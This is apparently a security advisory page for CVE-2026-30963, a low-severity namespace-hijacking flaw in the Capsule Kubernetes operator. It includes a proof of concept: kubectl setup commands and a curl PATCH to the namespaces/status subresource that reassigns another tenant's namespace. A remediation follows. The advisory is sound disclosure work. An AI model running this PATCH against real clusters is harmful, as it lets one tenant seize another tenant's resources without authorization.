Capsule CVE-2026-30963
LOW
GHSA-2ww6-hf35-mfjm
CVSS VectorNVD
CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:L/I:L/A:L
Lifecycle Timeline
2DescriptionNVD
Summary
To defend against namespace hijacking achieved through update/patch operations on namespaces, Capsule uses a webhook to validate update requests targeting namespaces. However, in Kubernetes, the namespace/finalize and namespace/status subresource APIs can also modify various fields of a namespace, including the metadata field. The webhook does not define interception rules for these subresources. As a result, if a tenant administrator has permission to modify namespace/status or namespace/finalize, they can successfully perform namespace hijacking.
Details
When Capsule uses a ValidatingWebhookConfiguration to intercept changes to namespace resources, it does not intercept modification requests initiated through namespace subresource APIs (see: https://github.com/projectcapsule/capsule/blob/main/charts/capsule/templates/validatingwebhookconfiguration.yaml#L193). Through subresource APIs, it is still possible to modify the metadata field of a namespace resource, enabling hijacking.
PoC
Open two terminals and create two tenants:
kubectl create -f - << EOF
apiVersion: capsule.clastix.io/v1beta2
kind: Tenant
metadata:
name: oil
spec:
owners:
- name: alice
kind: User
EOF
./hack/create-user.sh alice solar
export KUBECONFIG=alice-solar.kubeconfig
kubectl create namespace solar-production
# alice creates the namespacekubectl create -f - << EOF
apiVersion: capsule.clastix.io/v1beta2
kind: Tenant
metadata:
name: attacker
spec:
owners:
- name: attacker
kind: User
EOF
./hack/create-user.sh attacker attacker
export KUBECONFIG=attacker-attacker.kubeconfigWhen the attacker has permission to modify namespace/status or namespace/finalize, they can hijack other namespaces. Here we grant the attacker the relevant permissions:
kubectl create clusterrole status --verb=patch --resource=namespaces/status
kubectl create clusterrolebinding status --clusterrole=status --user=attackerThe attacker then sends a PATCH request to namespace/status to hijack the namespace created by alice:
curl -k --cert ./attacker-attacker.crt --key attacker-attacker.key --request PATCH 'https://192.168.201.12:6443/api/v1/namespaces/solar-production/status' \
--header 'Content-Type: application/json-patch+json' \
--data '[
{
"op": "replace",
"path": "/metadata/ownerReferences",
"value": [
{
"apiVersion": "capsule.clastix.io/v1beta2",
"kind": "Tenant",
"name": "attacker",
"uid": "1fcb9c9b-b552-4974-a248-32be66a2188c"
}
]
}
]'Impact
hijack namespace
Remediation
To mitigate this issue, add the following two subresources to the resources list in the ValidatingWebhookConfiguration rules:
resources:
- namespaces
- namespaces/status
- namespace/finalizeAnalysisAI
Namespace hijacking in Capsule (Kubernetes multi-tenancy operator) prior to v0.13.0 allows an authenticated tenant administrator to reassign any namespace to their own tenant by patching it through the namespace/status or namespace/finalize subresource APIs, which bypass Capsule's ValidatingWebhookConfiguration enforcement entirely. The webhook intercepts direct namespace modifications but omits these subresource paths, leaving a gap that an attacker with explicitly delegated RBAC permissions can exploit with a single PATCH request. …
Sign in for full analysis, threat intelligence, and remediation guidance.
Share
External POC / Exploit Code
Leaving vuln.today